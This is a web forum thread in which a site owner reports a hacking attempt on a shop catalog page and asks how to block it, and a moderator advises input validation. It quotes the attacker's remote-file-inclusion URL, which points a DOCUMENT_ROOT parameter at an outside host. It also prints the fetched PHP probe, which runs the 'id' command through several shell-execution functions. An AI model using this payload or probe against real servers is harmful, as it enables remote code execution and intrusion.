Hello all.
I Got hacked last night from Korea Republic ip 210.205.57.2. Browser: libwww-perl/5.79
This was a Bookmark entry and the landing page was:
myhomepage.com/catalog/my-lovemp3-sampledownload-p-172.html?language=de///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???
Landing page should be this:
myhomepage.com/catalog/my-lovemp3-sampledownload-p-172.html?language=de
without the following:
///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???
When I point my browser to:
samjinenginc.com/board/readme.txt???
the below script shows. After this, the next stats entry does not show only this error blocking the ip and country addresses:
Warning: gethostbyaddr() [function.gethostbyaddr]: Address is not in a.b.c.d form in /www/myhomepage.com/web/catalog/admin/supertracker.php on line 549
After this entry, all other enties are normal.
Not sure as to the total function of this script, but it appears to be blocking me from getting certain ip addresses, and country information. Is there a way to block this script?
This also blocked my other tracking scripts.
1. | <?php
2. | echo "Mic22";
3. | $cmd="id";
4. | $eseguicmd=ex($cmd);
5. | echo $eseguicmd;
6. | function ex($cfe){
7. | $res = '';
8. | if (!empty($cfe)){
9. | if(function_exists('exec')){
10. | @exec($cfe,$res);
11. | $res = join("\n",$res);
12. | }
13. | elseif(function_exists('shell_exec')){
14. | $res = @shell_exec($cfe);
15. | }
16. | elseif(function_exists('system')){
17. | @ob_start();
18. | @system($cfe);
19. | $res = @ob_get_contents();
20. | @ob_end_clean();
21. | }
22. | elseif(function_exists('passthru')){
23. | @ob_start();
24. | @passthru($cfe);
25. | $res = @ob_get_contents();
26. | @ob_end_clean();
27. | }
28. | elseif(@is_resource($f = @popen($cfe,"r"))){
29. | $res = "";
30. | while(!@feof($f)) { $res .= @fread($f,1024); }
31. | @pclose($f);
32. | }}
33. | return $res;
34. | }
35. | exit;
Thanks
Being Hacked
Moderator: General Moderators
Re: Being Hacked
In your script, how is
being used?
If you validate and filter that input well (as you should do with all input), it should not be possible to inject any code.
Code: Select all
?language=deIf you validate and filter that input well (as you should do with all input), it should not be possible to inject any code.